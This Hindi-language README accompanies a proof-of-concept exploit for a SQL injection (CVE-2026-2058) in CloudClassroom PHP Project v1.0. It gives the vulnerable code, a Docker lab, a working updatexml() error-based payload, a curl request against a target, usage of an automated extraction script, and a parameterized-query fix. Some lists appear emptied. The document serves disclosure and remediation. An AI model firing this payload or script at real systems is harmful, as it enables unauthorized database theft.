
CVE-2026-2058 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो CloudClassroom PHP Project में SQL इंजेक्शन है, जिसमें स्वचालित डेटाबेस एन्यूमरेशन और डेटा निष्कर्षण शामिल है।
CloudClassroom PHP प्रोजेक्ट (v1.0) की पोस्ट क्वेरी कार्यक्षमता में एक SQL इंजेक्शन भेद्यता मौजूद है।
यह भेद्यता हमलावरों को squeryx POST पैरामीटर के माध्यम से मनमाने SQL कमांड इंजेक्ट करने की अनुमति देती है, जिससे डेटाबेस एन्यूमरेशन और डेटा निष्कर्षण संभव होता है।
इस रिपॉजिटरी में एक प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट शामिल है जो दर्शाता है कि बैकएंड डेटाबेस से संवेदनशील डेटा निकालने के लिए भेद्यता का दुरुपयोग कैसे किया जा सकता है।
| फ़ील्ड | मान |
|---|
| CVE | CVE-2026-2058 |
| भेद्यता प्रकार | SQL इंजेक्शन |
| CWE | CWE-89 |
| प्रभावित सॉफ्टवेयर | CloudClassroom PHP प्रोजेक्ट |
| प्रभावित संस्करण | 1.0 |
| घटक | पोस्ट क्वेरी कार्यक्षमता |
| हमला वेक्टर | रिमोट |
| प्रमाणीकरण आवश्यक | नहीं |
| प्रभाव | डेटाबेस प्रकटीकरण |
| गंभीरता | उच्च |
| हमला पैटर्न संदर्भ | CAPEC-66 |
POST /postquerypublic
squeryx
बैकएंड कोड उचित सैनिटाइज़ेशन या पैरामीटराइज़्ड क्वेरी के बिना उपयोगकर्ता इनपुट को सीधे SQL क्वेरी में जोड़ता है।
भेद्य कोड का उदाहरण:
$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";
चूंकि $tempsquery उपयोगकर्ता इनपुट से प्राप्त होता है, हमलावर मनमाना SQL इंजेक्ट कर सकते हैं।
परीक्षण और शोध उद्देश्यों के लिए, एक भेद्य Docker वातावरण उपलब्ध है।
docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0
MySQL के updatexml() फ़ंक्शन का उपयोग करके एरर-आधारित SQL इंजेक्शन तकनीक के माध्यम से भेद्यता को ट्रिगर किया जा सकता है।
पेलोड का उदाहरण:
a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1
curl अनुरोध का उदाहरण:
curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"
अपेक्षित प्रतिक्रिया:
XPATH syntax error: '~cc_db~'
इस रिपॉजिटरी में एक bash एक्सप्लॉइट शामिल है जो स्वचालित रूप से:
chmod +x cloudclassroom_sqli_exploit.sh
./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic
उदाहरण:
./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic
एक हमलावर यह कर सकता है:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L⚠️ नोट: विभिन्न प्रभाव आकलनों के कारण NVD CVSS स्कोर CNA (VulDB) स्कोर से भिन्न है।
एक्सप्लॉइट प्रेडिक्शन स्कोरिंग सिस्टम (EPSS) उस संभावना का अनुमान लगाता है कि किसी भेद्यता का वास्तविक दुनिया में शोषण किया जाएगा।
| CVE | EPSS संभावना | प्रतिशतक | तिथि |
|---|---|---|---|
| CVE-2026-2058 | 0.00028 | 7.62 % | 2026-03-01 |
स्रोत: FIRST EPSS डेटासेट
डेवलपर्स को यह करना चाहिए:
सुरक्षित कार्यान्वयन का उदाहरण:
$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();


यह एक्सप्लॉइट केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है।
लेखक इस कोड के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
bl4dsc4n
सुरक्षा शोधकर्ता